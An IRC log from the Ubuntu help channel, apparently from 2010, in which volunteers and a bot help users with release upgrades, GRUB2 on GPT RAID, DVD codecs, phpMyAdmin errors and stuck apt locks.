sebsebsebcrazygir: maybe start over with a new Firefox profile?03:49
crazygirhah, so let's deny ubuntu having bugs?03:49
Nitrus^1sebsebseb: i did a do-release-upgrade from whatever the last LTS was to the newest03:50
sebsebsebNitrus^1: if thats so why are you on 8.10?03:50
crazygirI'll test, sure03:50
crazygirdidn't think of the profile03:50
sultanselephantmaybe he's a star trek fan03:50
Nitrus^1i'm not on 10. whatever03:50
crazygirif thatis the problem, I hope febe can restore without problems03:50
server_im having difficulty running xubuntu 10.4 without a monitor, it just wont work, i tried editing a xorg.conf which i had to make because one didnt exist. and it kinda ruined my system cause i couldnt get back in. however i was able to fix it.03:50
crazygirruined your system?03:51
crazygirdem some harsh words03:51
server_black screen03:51
crazygirthat's misconfigured, not ruined03:51
IdleOneNitrus^1: just to confirm, can you run lsb_release -a and check what version you are on now?03:51
sultanselephanthe means broke it03:51
server_but i deleted the xorg and it bootes03:51
crazygiris that akin todeleting program files?03:52
server_i tried two different xorg configs03:52
server_xorg never existed03:52
server_i had to make it in x1103:52
sebsebsebcrazygir: do you know about the hidden .folders in Home ?03:52
ubottuPlease watch your language and topic to help keep this channel family friendly.03:52
crazygirsebsebseb: umm.. yes?03:52
Nitrus^1i tweaked by release-upgrades file from LTS to normal03:52
crazygirserver_: post your config, log, and problem :)03:52
Nitrus^1i didnt check before i ran the upgrade process03:53
Nitrus^1so now i'm on 8.1003:53
sebsebsebcrazygir:  ok .mozilla is your Firerfox profile, if you delete/move that, then re open Firefox, it will be like you just installed it.  also if you delete it you would lose anything in it of course03:53
Nitrus^1i was on 8.0403:53
IdleOneNitrus^1: ok upgrade to 9.0403:53
crazygirright, I understand03:53
server_well there currently is no config xorg.conf doesnt exist, i tried using xorg failsafe and it didnt work either03:53
Nitrus^1can i switch back to LTS when i get current?03:53
sebsebsebNitrus^1: 9.04 is :)03:53
orangeglohow can i partition my hard drive?03:53
crazygirthanks for the suggestion :)03:53
server_its using intel driver03:53
IdleOneNitrus^1: or do a fresh install of 10.0403:53
sebsebsebNitrus^1: you can  upgrade all the way to 10.04, or just upgrade to 9.04 and use that for now03:53
soreau! partition | orangeglo03:54
ubottuorangeglo: For help with partitioning a new install see: https://help.ubuntu.com/8.04/switching/installing-partitioning.html - For partitioning programs see !GParted, !QtParted (!Kubuntu 8.10 and lower) or !PartitionManager (!Kubuntu 9.04 and up) - Other partitioning topics include !fstab !home and !swap03:54
sebsebsebNitrus^1: or clean install and do 10.0403:54
scunizisebsebseb: Nitrus^1 10.04 is LTS ..03:54
sebsebsebscunizi: I know03:54
server_when i boot without monitor it gets a blank screen, plug it back in and its still blank03:54
Nitrus^1ok so at this point LTS=current normal release03:54
scunizisebsebseb: I figured that :)03:54
IdleOneNitrus^1: correct03:54
Nitrus^1until there is another update03:54
sebsebseb!lts | Nitrus^103:54
ubottuNitrus^1: LTS means Long Term Support. LTS versions of Ubuntu will be supported for 3 years on the desktop, and 5 years on the server. The current LTS version of Ubuntu is !Lucid (Lucid Lynx 10.04)03:54
ubuntu_Roasted: I get the login by https://<ipnumber>/ebox in my browser03:54
sebsebsebcrazygir: http://www.omgubuntu.co.uk/2010/06/fixing-fullscreen-flash-in-ubuntu-1004.html03:55
Nitrus^1thanks guys!03:55
IdleOneNitrus^1: back ups!03:55
Nitrus^1i was wondering what the heck was going on03:55
domino14hi. I put in a DVD "sound of music" into my computer, and it doesn't get recognized. but another DVD gets recognized and Movie Player opens fine.03:55
domino14yet Sound of Music gets recognized by a Mac. any ideas?03:55
domino14my computer is running the latest version of Ubuntu03:55
sebsebsebNitrus^1: 10.04 doesn't offer that much advantage over 9.04, also soon  9.04 will even get a proper Firefox update :)   so ok to still run that untill end of October03:56
Roastedubuntu_, thanks. I think I forgot something. I selected ebox common or w/e in software ctr thinking it'd grab everything, but it didnt. I forgot you need to either install individually or apt-get ebox-* or whatever t download ebox + all ebox modules. doing that now03:56
orangegloim install windows onto my ubuntu laptop, how can i partition ahead of time so i can dedicate windows to that specific partition?03:56
sebsebseborangeglo: uhmm03:56
Nitrus^1sebsebseb: i'm going up to 10.04, it's a headless server system03:56
Kamil_hello. i have a program installed in my home directory and i would ubuntu to execute it upon startup. what is the recommended way to do this with ubuntu 10.04?03:57
sebsebseborangeglo: if you install Windows after Ubuntu, Windows will go over the MBR Master Boot Record, so only Windows can boot03:57
sebsebseborangeglo: then you can re install Grub 2, but its not that easy03:57
sebsebsebNitrus^1: oh the actsaul server edition or?03:57
=== Omni|AFK is now known as Omnifarious
domino14why cant my Ubuntu computer recognzie a certain DVD but my Mac can?03:57
sebsebsebNitrus^1: well in that case yes, upgrade to 10.0403:57
server_headless wont work for me, it will only boot with a monitor ah03:57
OmnifariousI'm having a really hard time installing grub on a system where /boot is on a Linux software RAID.03:57
n2diydomino14: Ubuntu doesn't have the proper codecs, google is your friiend here.03:58
Maartendomino14: It is more likely to be a limitation of the DVD drive then the operating system - although it IS possible ubuntu does not recognize certain DVD copy protections.03:58
domino14n2diy: but another DVD plays just fine.03:58
domino14DVDs have different formats of data?03:58
sebsebseb!grub2 | orangeglo03:59
sultanselephant!medibuntu | domino1403:59
ubottuorangeglo: GRUB2 is the default Ubuntu boot manager since Karmic. For more information and troubleshooting on GRUB2 please refer to https://wiki.ubuntu.com/Grub203:59
ubottudomino14: medibuntu is a repository of packages that cannot be included into the Ubuntu distribution for legal reasons - See http://www.medibuntu.org03:59
domino14this dvd DOES say "these dvds are copy protected"03:59
n2diydomino14: on the same Umuntu box?03:59
scunizidomino14: DRM is the reason..03:59
orangeglosebsebseb: should i just install windows, and then create a partition and install ubuntu onto that partition?03:59
domino14on the same ubuntu box yes03:59
scunizi!dvd | domino1403:59
ubottudomino14: For multimedia issues, this page has useful information: https://help.ubuntu.com/community/RestrictedFormats - See also https://help.ubuntu.com/10.04/musicvideophotos/C/video.html - But please use free formats if you can: https://help.ubuntu.com/community/FreeFormats03:59
domino14but how does the Mac recognize this DRM then?03:59
domino14surely the codecs are somewhere03:59
scunizidomino14: you've paid for the codecs in mac03:59
sebsebseborangeglo: depending on what you want to use WIndows for, and  how much RAM you have and such,  a virtual machine of WIndows may be rather ideal to have inside Ubuntu03:59
scunizi!medibuntu | domino1404:00
ubottudomino14: medibuntu is a repository of packages that cannot be included into the Ubuntu distribution for legal reasons - See http://www.medibuntu.org04:00
n2diydomino14: double check the config jumpers on the drive,  and clean it, if that doesn't work....?04:00
sultanselephant!mint | domino1404:00
ubottudomino14: There are some Ubuntu derivatives that we cannot provide support for due to repository and software changes. Please consult their websites for more information. Examples: gNewSense (support in #gnewsense), Linux Mint (see !mintsupport), LinuxMCE (support in #linuxmce), CrunchBang (support in #crunchbang), BackTrack (support in #backtrack-linux)04:00
soreauorangeglo: When you go to install the other OS first, just tell it to use whatever amount of the hard disk you want then install ubuntu on the rest and the grub boot loader will be automatically configured04:00
* sultanselephant twiddles thumbs04:00
server_anyone know how to switch to vesa drivers/04:00
domino14what is mint04:00
ubottuLinux Mint is not a supported derivative of Ubuntu, please seek support in #linuxmint-help on irc.spotchat.org04:00
orangeglosebsebseb: i just wanted windows for gaming04:00
Maartenhmm.... I am starting to like my Mint install a lot more then Ubuntu actually.04:00
sebsebsebsoreau: orangeglo wants to put WIndows on after Ubuntu04:00
rwwoobe: Something we can help with?04:01
sebsebseborangeglo: depending on the games, they may work quite well in Wine, maybe even a virtual machine  even depending on games and how things are set up and that04:01
sultanselephantMaarten: ever try Ultimate04:01
oobedo you do laundry?04:01
Roastedubuntu_, the curve ball was the S - need https not http. :P04:01
sultanselephantthats a crazy remix04:01
orangeglosebsebseb: how can i create a virtual windows?04:01
sebsebseborangejuice: are the games 3D?04:02
Maartensultanselephant: Ultimate what? I am multibooting on this laptop between Windows 7 Ultimate and Linux Mint 904:02
sebsebsebMaarten: you want the Mint channels then04:02
sultanselephantMaarten: Ultimate Edition, it's a Ubuntu remix04:02
sebsebsebMint channel04:02
sultanselephantsebsebseb: nah its the same OS04:02
dekenxHow can I disable firewire modules when booting from a Live CD (via boot parameters)?04:02
sebsebsebsultanselephant: uhmm don't recommend Ultimate to people such as Maarten04:02
Maartensebsebseb: I am on that already on Spotchat :P04:02
sebsebsebsultanselephant: real Ubuntu  is better really I guess04:02
sebsebsebMaarten: ok well Mint support is off topic here04:02
=== rp_ is now known as mrrcp
ActionParsnipsultanselephant: ultimate is offtopic and not supported here04:02
sebsebseb!ultimate | sultanselephant04:03
ubottusultanselephant: The following are some examples of Ubuntu derived distributions that we cannot provide support for due to repository and software changes; please consult their websites for more information: gNewSense (support in #gnewsense), Linux Mint (see !mintsupport), LinuxMCE (support in #linuxmce), Ultimate Edition04:03
sultanselephantput down the guns04:04
sultanselephanteveryone take a deep breath04:04
soreau! vbox | orangejuice04:04
ubottuorangejuice: virtualbox is a x86 !virtualizer. A !free edition is available from the package 'virtualbox-ose'. A non-free edition is available at http://virtualbox.org for most Ubuntu releases (help in #vbox) - Setup details at https://help.ubuntu.com/community/VirtualBox04:04
sebsebseborangejuice: both versions are free as in price04:04
sultanselephantfree as in beer04:04
sebsebseborangejuice: one from repo is open source,  and lacks USB support unlike the one from website/webserver04:04
sebsebseborangejuice: how much RAM you got?04:04
ActionParsniporangejuice: if you use samba you can access the usb devices via shared folders on LAN :)04:05
sultanselephantubuntu is a start-up company, those remixes are just renegade kids04:05
Roastedubuntu_, is there a lamp module for ebox?04:05
MaartenI just upgraded my elitebook to a 500 Gb harddrive and 8 Gb of ram.... just installed Virtualbox-ose as well, gonna play with it some. :)04:05
ubuntu_Roasted: yeah, the 's' fooled me at first too.04:05
ActionParsnipsultanselephant: non canonical distros based on Ubuntu are not supported here, its that clean cut04:05
n2diystart up company, at five + years old?04:06
ubuntu_Roasted: well under the covers the web server is Apache (the A)04:06
Roastedunder the covers?04:06
sebsebseborangejuice: seems we lost you?04:06
sultanselephantCanonical is a start-up, yeah04:06
ubottuCanonical Ltd. is committed to the development, distribution and promotion of open source software products, and to providing tools and support to the open source community. It is the driving force behind the Ubuntu, Kubuntu, Xubuntu, and Edubuntu Operating Systems. Canonical's website is at http://www.canonical.com/04:06
ubuntu_Roasted: lets see, remind me the other L, M,P are again?04:07
TamnakzCan anyone help me get a mic working with skype? Works fine for 8.1004:07
n2diysultanselephant: how old does a company have to be before you don't consider it a start up?04:07
Roastedubuntu_, I have no idea - I just told my buddy I wanted to share out files FTP-style but not FTP and he said use LAMP.04:07
sultanselephantn2diy: ill take it to pm if you want04:07
n2diysultanselephant: ok.04:08
Phil2010Does this look like Ubuntu setup fine?04:08
domino14are there any other DVD codecs I don't know about? i installed the dvd css but it still wont recognize this dvd04:08
domino14it's "copy protected". the Mac recognizes it fine04:08
Tamnakz Can anyone help me get a mic working with skype? Works fine for 8.1004:08
ubuntu_Roasted: hmmm... I wonder if they meant http or something.  I know ebox provides file sharing AND ftp (distinguishes between).04:08
sultanselephantTamnakz: did you configure it as your input device?04:09
Roastedubuntu_, also, do you know if ebox can suck up the current samba setup? I have samba set up here and ebox isnt detecting my shares/users/etc.04:09
sebsebsebActionParsnip: turns out the person I was trying to help orangelo left here a little while ago, and for some reason someone is calling themselves orangejuice on here04:09
Tamnakzsultanselephant: I have it setup properly for ubuntu, but in skype, it only allows me to select 'pulseaudio server (local)' for the mic04:09
ActionParsnipRoasted: could use ssh to configure stuff at command line04:09
ActionParsnipsebsebseb: weird04:09
RoastedActionParsnip, pardon? in reference to what? adding existent samba shares to ebox?04:10
sebsebsebActionParsnip: yeah its a bit odd I guess, that someone is calling themselves orangejuice on here,  then again maybe its a bot or something04:10
ActionParsnipRoasted: you can add samba shares by editting /etc/samba/smb.conf04:10
sultanselephantTamnakz: what plugin otherwise04:10
blockydoes anyone know of a linux alternative to the windows tool "Search Everything"04:10
Tamnakzsultanselephant: what do you mean?04:10
sultanselephantdid you try restarting X with the mic plugged in or rebooting with the mic plugged in04:11
mikeruany good reason i should install pommed?04:11
RoastedActionParsnip, I have samba set up. I've had it set up for years. I'm just curious if there's a way for ebox (that I just installed) to "suck up" already existent samba configurations, because right now ebox shows I have 0 samba users and 0 samba shares.04:11
mikeruI installed it, and I really see no difference between it installed and not04:11
mikeruexcept the backlight better seems to be less buggy04:11
mikerubut the sound level seems to be buggier04:11
n2diyblocky: find, locate, and others04:11
ActionParsnipRoasted: never used ebox dude, ssh is far lighter and will allow you to transfer knowledge between lans as ssh is ssh and samba is samba, networks may not employ ebox though04:12
RoastedActionParsnip, I use samba because it works for each file/print sharing with windows, mac, and linux. I fail to see how SSH has any relevance here...04:12
RoastedActionParsnip, eBox is just a management tool similar to webmin to tie everything together in a web based GUI.04:12
OmnifariousHow do I make grub2 work properly for my GPT system where I'm using a Linux software RAID1 for /boot04:13
RoastedActionParsnip, I'm just trying to migrate from webmin to ebox since it was brought to my attention this evening webmin is not officially supported whereas ebox is, so I figured it'd be in my best interest to at least tinker with ebox for a while.04:13
jimisrvroxYankDownUnder: hey mate04:13
ActionParsnipRoasted: you can connect to the remote system using ssh, edit smb.conf then restart the samba service and the share will be added / remove / modified depending on how you edit the smb.conf file04:13
ActionParsnipRoasted: yeah webmin tends to break stuff04:13
RoastedActionParsnip, I never had an issue with it. In fact I've always thought very highly of that program. I got on webmin years ago when ebox was still kind of a beta product that nobody trusted for production gear.04:14
Roastedlol I just installed myphpadmin and didnt put in a password during the install and now I cant log in to it in the web gui :(04:14
Roastedyay for apt-get remove/install.04:15
ActionParsnipRoasted: try: sudo dpkg-reconfigure myphpadmin04:15
wildbatOmnifarious, just install as normal ~04:15
ActionParsnipRoasted: should run the postinst config again04:16
RoastedActionParsnip, thanks bro, but it's already done reinstalling :P04:16
RoastedActionParsnip, GAH. It errored out. FML04:16
ActionParsnipRoasted: well you got it for next time04:16
Omnifariouswildbat: It didn't work.04:16
Roasted#1045 Cannot log in to the MySQL server04:16
OmnifariousI kept getting errors while installing the bootloader.04:16
Jordan_UOmnifarious: Have you created a BIOS boot partition?04:16
wildbatOmnifarious, pastebin the error?04:17
OmnifariousJordan_U: Not exactly.  There is a BIOS partition stating the entire drive is GPT.04:18
Jordan_UOmnifarious: http://grub.enbug.org/BIOS_Boot_Partition04:18
Dargonwhats the command to list running proceses, i forget :/04:19
Ashfire908My network icon is missing from my notification area.04:19
Dargonthe proc i need isnt in top04:19
Dargoni dont like using killall :/04:19
AAAps auxwwww04:19
Dargonthnx aaa04:19
Jordan_UOmnifarious: There is no such thing as a BIOS partition, you are talking about the protective msdos partition.04:19
blockywhat does it mean if dpkg says: tracker set to manually installed.04:20
n2diyDargon: you can sort the way top list processes.04:20
Ashfire908Sorry, I'm running 10.04, and I'd like to get the network icon back.04:20
AAAJordan_U  technically there are BIOS partitions, but that is not what he is talking about =p04:20
sebsebseb!panels | Ashfire90804:20
ubottuAshfire908: To reset the gnome panel to defaults, type this in a !terminal: « gconftool --recursive-unset /apps/panel && killall gnome-panel »04:20
Omnifariouswildbat: http://pastebin.com/yxcseiXk04:21
Jordan_UAAA: What iis a BIOS partition?04:21
AAAJordan_U  a chip that has 2 separtate BIOS blocks/partitions.  I've seen it on intel boards04:22
OmnifariousI was talking about the protective msdos partition.04:22
ubuntu_Roasted: great question.  Sorry I don't know.  Just started playing w/ it myself.04:22
DargonAAA, what flag to only display processes with a certain name?04:22
AAADargon  I usually grep for what I want.  ps auxwww | grep foo04:23
bastid_raZorDargon: ps aux | grep -i certain-name04:23
=== Ashfire is now known as Ashfire908
Dargonthnx guys04:23
OmnifariousJordan_U: In order to make that BIOS parition thing you're talking about, I'm going to have to re-install.  *sigh*04:23
n2diyDargon: if you know the name of the process use killall process name.04:23
Roastedgetting this error when I try to install phpmyadmin. http://pastebin.org/329209 any ideas?04:24
psusieh?  you talking about the grub bios boot partition for gpt partitioned disks?04:24
AAARoasted  looks like your password isn't correct04:24
Dargonalso, when i installed ebox, it installed postgresql, will phpmyadmin work with mysql?04:25
RoastedAAA I dont understand where the issue is. unless the PW is blank04:25
AAARoasted  can you log into to it from a shell?04:25
Dargonwith postgresql04:25
centr0i seem to have messed up my applications.menu  can someone pastebin theirs pls?04:25
centr0or a link where i can find the default one.04:25
RoastedAAA, log into what?04:25
AAARoasted  try logging into the phpmyadim database via mysql clit04:25
RoastedAAA, I have no idea how to do that :(04:25
OmnifariousJordan_U: I shouldn't actually need one.  But I can see how grub might be getting confused enough to think so.04:26
oobe#*.* #q_p# #poop# #*.*# #poo04:26
OmnifariousAfter all, it's not obvious that all the blocks in /dev/md0 are also on /dev/sda04:26
rwwcentr0: "rm -r ~/.local/share/applications/" should reset your applications menu to the system default.04:26
Ashfire908sebsebseb, That did not help. Now I have to add all the stuff back on that I changed.04:26
AAARoasted  is mysql installed? dpkg -l|grep mysql04:26
redbaritoneInstalled edubuntu 10.04 on a new server recently (to be used as an ltsp server). When installing updates, it asked if I wanted to proceed without installing grub. I did. How would grub help me?04:26
redbaritone It seems to work fine.04:26
RoastedAAA, yes its installed.04:27
OmnifariousThis would be so much simpler if I used the BIOS RAID.  But then I couldn't play around with btrfs RAID.04:27
DargonAAA, can i run mysql alongside the postgresql that installed with ebox, or do i need to remove postgresql first?04:27
RoastedAAA, I have no termianl window open, yet synaptic is locked out. nice.04:27
psusiOmnifarious, pure soft raid is better supported than bios fake raid04:27
Jordan_UOmnifarious: grub needs an area to embed its code for reading mdraid (as well as your ext4 filesystem). GPT does not have a post MBR gap like msdos labels often have, and so a BIOS boot partition is needed.04:27
AAARoasted  I don't have mysql handy, but something like mysqlshow<tab tab> show give you a list of mysqlshow commands tdhat will list your databases.  look for the phpmyadmin one04:27
=== poutine is now known as Yahweh
edbianredbaritone, grub is a boot loader.  It allows the computer to turn on and find the operating systems on a hdd.04:28
Jordan_UOmnifarious: Even with fakraid and gpt, you'd still need a BIOS boot partition.04:28
Ashfire908Anyone else know how to get the network manager icon back (it's not it's own applet).04:28
RoastedAAA, to be honest, I'd just like to wipe what I have and start over, but somehow sql/php/whatever isnt liking that, whcih si when I ran into these issues.04:28
AAARoasted  then something like $ mysql -uroot -Dyourdatabase04:28
OmnifariousJordan_U: *nod*  I understand.  In this particular case, since /dev/md0 is a RAID0, it can sort of treat /dev/md0 as if its only on /dev/sda while loading the .img file it needs.04:28
edbianAshfire908, It's part of the notification are04:28
RoastedAAA, and now that synaptic cannot get the exclusive lock due to terminal (yet terminal is closed) I may have to reboot to get this running again04:28
acovrigcan anyone help with a dansguardian configuration?04:28
oobe#*.* #q_p# #poop# #*.*# #poo #fuck# ##fuck##04:29
edbianAshfire908, notification area*04:29
redbaritoneedbian: so, If I ONLY need edubuntu, I'm fine without it?04:29
Roastedyeah. I'm going to reboot. and get a stiff drink. fking thing. brb04:29
OmnifariousErr, RAID104:29
AAARoasted  sounds like you have auto update or something going04:29
edbianAshfire908, I can't tell you the number of people that come in here asking for that.04:29
* Omnifarious grins sheepishly.04:29
psusiOmnifarious, no, it can't... since md0 is a partition, not a disk04:29
edbianredbaritone, You need some bootloader on a hdd in order to boot operating systems on that hdd04:29
n2diyAshfire908: right click on the panel, and select add?04:29
edbianredbaritone, grub is an example of a bootloader.04:29
edbianredbaritone, Does that answer your question?04:29
Omnifariouspsusi: It just so happens that each and every single block on md0 actually corresponds directly to a block on /dev/sda04:29
Ashfire908I've got the notification area already added!04:29
OmnifariousSo yes, it could potentially generate the block list it needs.04:30
psusiOmnifarious, grub has to install the core image somewhere... usually it goes in the unused space between the mbr and the first partition of a disk04:30
centr0rww: thanks ill try that.  is there any way to log out of X through xterm/terminal?  i seem to have lost my logout button as well :P04:30
redbaritoneI'm getting it to boot fine. So I'm assuming I didn't need to upgrade.04:30
mermaAshfire908, nm-applet04:30
rwwcentr0: there should be a logout option in the System menu if you don't have a logout button on the panel.04:30
psusiOmnifarious, eh?  how so?  what is the raid setup here?04:30
Jordan_UOmnifarious: Blocklists are unreliable though.04:30
Omnifariouspsusi: Well, it could also use a block list and store that in the MBR.04:30
=== joe__ is now known as joejc
centr0rww: thanks!04:31
Omnifariouspsusi: RAID1, two disks.  I've been finding that disks are giving out on me.04:31
psusiOmnifarious, block lists are prone to breakage and are depreciated in grub204:31
edbianAshfire908, http://ubuntuforums.org/showthread.php?t=1486103   see what hwttdz says in post #704:31
* Omnifarious nods.04:31
redbaritoneedbian: thx04:31
edbianredbaritone, Yep! :)04:31
psusiOmnifarious, ok, so two disks in an md raid1... so what's the problem now?04:31
OmnifariousTime to painstakingly set up the fs layout again and re-isntall.04:32
psusido bear with me, I am a bit drunk ;)04:32
rwwdon't drink and IRC, it ends badly ;P04:32
psusihey, I'm drinking and trying to package the new upstream lvm2 on maverick, so... ;)04:33
Omnifariouspsusi: grub won't install properly.  I think it can't figure out that the blocks on md0 are also on /dev/sda where I want it to install.  And since I'm using GPT it has to use block lists and to use those it has to know that the blocks are on the same disk its being installed on.04:33
centr0hm, my applications menu did not change. :(04:33
mermagreat news for the lvm2 project04:33
Jordan_Uredbaritone: Are you running Ubuntu in a VMware virtual machine?04:33
owen1how to install ibus on xubuntu?04:33
=== Bas is now known as Bash_75
sebsebsebcentr0: shut down and log out should be in the system menu,  according to upstream Gnome :)  thats also how other Desktop Linux distros still do it :)04:33
redbaritoneJodan_U: No04:33
sebsebsebcentr0: so you been in menu editor playing around or?04:33
psusiI think I have the package on the run... it's compiled and built... now i just need to install it and reboot and pray to god it worked... and maybe I can finally make a snapshot before trying and upgrade and then if it goes tits up, revert easily04:34
tucemiuxrww, did you leave?04:34
centr0oh sebsebseb:  i logged out to see if the changes i made would bring the default menu back but it didnt.04:34
RoastedAAA, still here?04:34
Jordan_Uredbaritone: Can you pastebin the output of "ls -l /dev/disk/by-id/" ?04:34
edbiansebsebseb, How are you??04:34
sebsebsebedbian: ok you?04:34
psusiOmnifarious, iirc, if you are using gpt, to install grub you have to have the bios boot partition04:34
edbiansebsebseb, Good, just helping others with linux! :)04:34
RoastedI just closed terminal, and tried to open synaptic, but it says I cannot get an exclusive lock for synaptic. Excuse my abbriviated language, but wtf?04:35
psusiOmnifarious, without gpt it installs the core image to the embed area... out of curiosity though, why are you using gpt?04:35
Roastednow I cant even apt-get remove/install via termianl either. Wow. Really ubuntu?04:35
sebsebsebcentr0: what is missing in applications menu?04:35
tucemiuxRoasted, do you have the software center opened or installing another app right now?04:35
Roastedtucemiux, nope.04:35
RoastedI cant do anything now. sweet.04:35
sebsebsebcentr0: if you go to system > preferences > main menu you can add stuff yourself04:36
edbianRoasted, You have some instance of the package manager open.  It might be gui-less and frozen but it is there.  look at ps -e to get a complete list of everything running04:36
centr0everything, i accidentally deleted everything! lol04:36
tucemiuxRoasted, then it must be some lock, do you get an error message asking you to perform a task when you run sudo apt-get update ?04:36
sebsebsebcentr0: have you got a system menu?04:36
centr0thats just it.. i dont have a sys > pref04:36
n2diyRoasted: sounds like you have a stuck lock file in apt-get, track it down and delete it.04:36
Omnifariouspsusi: Because I think msdos partition tables are really dumb and archaic.  :-)04:36
Roastededbian, there's nothing running.04:36
Roastedn2diy, how04:36
edbianRoasted, ps -e | grep apt    (might be helpful, takes the output of ps -e and only shows the lines that have apt in them)04:36
Roastedtucemiux, yes - when I opened synaptic it wanted me to run configure -a or whatever. I did. It errored out.04:36
Pici!aptfix | Roasted04:36
ubottuRoasted: If an APT front-end crashed and your database is locked, try this in a !terminal: « sudo fuser -vki /var/lib/dpkg/lock;sudo dpkg --configure -a »04:36
Roastedfricken phpmyadmin04:36
n2diyRoasted: find your apt-get directory, and the lock file in it.04:36
edbianRoasted, I assure you there is.  You can also sudo rm the lock file04:36
Roastedthats what's doing it04:36
centr0sebsebseb: yes with only help, about ubuntu, about gnome,lock screen, logout, shut down04:36
sebsebsebcentr0: and no applications menu at all?04:37
psusiOmnifarious, ok... so you want to use gpt... check... I forget whether I am at this point or not... now... did you set up the grub bios boot partition?  and I assume you are on a bios using pc not an EFI system?04:37
Roastededbian, I booted up, opened terminal, closed terminal, opened synaptic, errored out. closed synaptic, opened terminal, errored out. If anything is running, *I* did not open it.04:37
centr0sebsebseb: there is applications menu..  with nothing in it.  when i try to right click it to 'edit menu' nothing pops up.04:37
PiciRoasted: Please see the suggestion from ubottu that I gave you.04:37
Roastededbian, what do I look for with ps -e04:37
edbianRoasted, synaptic must not have closed completely (just because you can't see it doesn't mean it isn't running).  Try sudo killall synaptic and then try again04:37
centr0sebsebseb: .config/menus/applications.menu is completely empty04:37
sebsebsebcentr0: ok, but can you get into that main menu program?04:38
Omnifariouspsusi: I didn't.  I was hoping to use block lists, but I don't think that'll work so well in this case.04:38
edbianRoasted, ps -e lists all running processes look for anything with apt, synaptic, or dpkg04:38
tucemiuxRoasted, try PIci's suggestion04:38
psusiit's been a few weeks since I looked at the grub2 code so I need to talk this out to make it come back to me...04:38
RoastedPici, it errored out.04:38
sebsebsebcentr0: and you tried  rww suggestion yeah, and didn't work?04:38
Omnifariouspsusi: And anyway, it's being deprecated.  :-)04:38
Roastederrors were encountered while processing - phpmyadmin04:38
psusiOmnifarious, block lists are bad... if you are going to use gpt, you should set up the bios partition ;)04:38
Roastedmy god, why is phpadmuin being such a fing brat04:38
centr0sebsebseb: yes i tried rww's suggestion.  that didnt work.04:38
sebsebsebcentr0: can you do this?  system > preferences > main menu04:38
sebsebsebRoasted: uhmm language04:39
n2diyRoasted: /etc/apt04:39
Roastedlol, sebsebseb????04:39
Omnifariouspsusi: *laugh*  Yeah, I figured someone would say that.  :_)04:39
Roastedn2diy, pardon?04:39
centr0sebsebseb: no.  there is no 'preferences > main menu'04:39
sebsebsebcentr0: got menu editor or something like that?04:39
n2diyRoasted:your lock file will be somewhere in /etc/apt04:39
Omnifariouspsusi: You know, the Fedora channel contains a whole bunch of incredible jerks.04:39
Roastedomg synaptic opened04:39
OmnifariousI hate going there to ask any questions.04:40
centr0sebsebseb: i dont have one..  cant get the window to open when i try the 'edit menu' opt04:40
Roastedwhat do I do next. I dont want this system to brick again. should I do a complete removal of phpmyadmin?04:40
psusiOmnifarious, iirc, grub will fall back to block lists if it can't find an embed area on an msdos partition table... but I think it required the bios partition for gpt... either way, it's a good idea ;)04:40
=== rabidweezle is now known as Type-O
vern_is ubuntu have some app that can add dialog text box to video(avi)04:40
Omnifariouspsusi: I think, in this case, its failing to fall back because it can't figure out that all the blocks on md0 are also on /dev/sda04:40
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Omnifariouspsusi: Which, I will admit, would take a bit of work to figure out.04:41
sebsebsebcentr0: can you get into the terminal?04:41
sebsebsebcentr0: ok not with the menu, but theres another way04:41
vern_some video editing can add dialog box in avi files?04:41
centr0sebsebseb: yes via 'create launcher , command: xterm'04:41
edbianRoasted, what worked (just for my personal knowledge)04:41
sebsebsebcentr0: I am thinking make a new user  in there, or  recovery mode04:41
Roastededbian, nothing worked, but magically synaptic was able to be opened again.04:41
edbianRoasted, mmm, ok04:42
centr0new user is fine!  i barely did anything..  just trying to setup dual monitors.04:42
Roastededbian, Im just questioning if I can do a comlete removal of phpmyadmin now since its open.04:42
centr0is it as simple as 'adduser'?04:42
psusiOmnifarious, wait... what is the layout again?  sda and sdb are ach gpt disks with one raid partition and the two partitions form mirrors in a raid1?04:42
edbianRoasted, you should be able to04:42
sebsebsebcentr0: yes adduser04:42
sebsebsebcentr0: if you replace the correct hidden .folders in Gnome with clean ones, things are likely to work properly again04:42
centr0sebsebseb: this user is the default user that ubuntu logs on though.. is there anyway to change that?04:42
Roastededbian, ha! sweet! it errored out!04:42
sebsebsebcentr0: thats basically all I can think of04:42
edbianRoasted, ha ha04:42
RoastedE: phpmyadmin: subprocess installed pre-removal script returned error exit status 104:42
RoastedWOW. Nice.04:42
Omnifariouspsusi: Yes.04:42
edbianRoasted, anything else in the error?04:43
Roastedhow can I remove this package. Somebody. Please.04:43
sebsebsebcentr0: your other user can do sudo and such as well if set up04:43
Roastedthats it04:43
Roastedthats the entire error04:43
Omnifariouspsusi: Actually, they have two RAID partitions.  One is for /boot and the other is for LVM.04:43
Roastededbian, I get more info in terminal tho if I remove --purge it. want me to do that and paste it?04:43
ubottuwebmin is no longer supported in Debian and Ubuntu. It is not compatible with the way that Ubuntu packages handle configuration files, and is likely to cause unexpected issues with your system. See !ebox instead.04:43
edbianRoasted, try fixing all packages:  sudo aptitude install -f   dont'04:43
sebsebsebcentr0: does your name show on the top right panel?  or can you go into04:43
edbian Roasted Don't blindly say yes but see what it wants to do and think about it.04:43
psusiOmnifarious, if you really want to use gpt, then you need to create the bios boot partition on the gpt disk... it doesn't really ... oh... you have a /boot... that's different04:43
psusiOmnifarious, do you have a /boot on both disks?04:44
centr0sebsebseb: nothing.  i totally deleted that top bar. so anything that was there is not anymore ;P04:44
sebsebsebcentr0: I thin its system > administration  > users and groups or something like that, not on Ubuntu right now04:44
Dargonanyone have success with webmin on debian?04:44
edbianRoasted, I think it probably just error-ed out because it was never installed correctly.  You can though if you'd like.  More info is always better.04:44
Roastededbian, do I include the dont' at the end of that command? or is that command done at the f?04:44
sebsebsebcentr0: oh04:44
Roastededbian, I just dont understand why I cant nuke it. Its BS.04:44
sebsebsebcentr0: well  this command may work04:44
sebsebseb!panels | centr004:44
ubottucentr0: To reset the gnome panel to defaults, type this in a !terminal: « gconftool --recursive-unset /apps/panel && killall gnome-panel »04:44
edbianRoasted, That dont' was a typo :)  "sudo aptitude install -f"04:44
Roastededbian, yeah, that errored out too.04:45
Omnifariouspsusi: Yes, but it's a RAID.  :-)04:45
RoastedI figured it was just till the -f. Ive used that command before.04:45
edbianRoasted, Lemme see the errors from sudo apt-get purge phpmyadmin at the term04:45
Roastedit says something about a password, yet I didnt set one up...04:45
Roasteduh crap. I got different errors this time...04:45
edbianRoasted, no offense but you must have a password ;)04:45
centr0sebsebseb: everything just flickered.  gonna try to log out and see if that did anything.  if not ill just create a new user04:46
Roastedseveral files are locked04:46
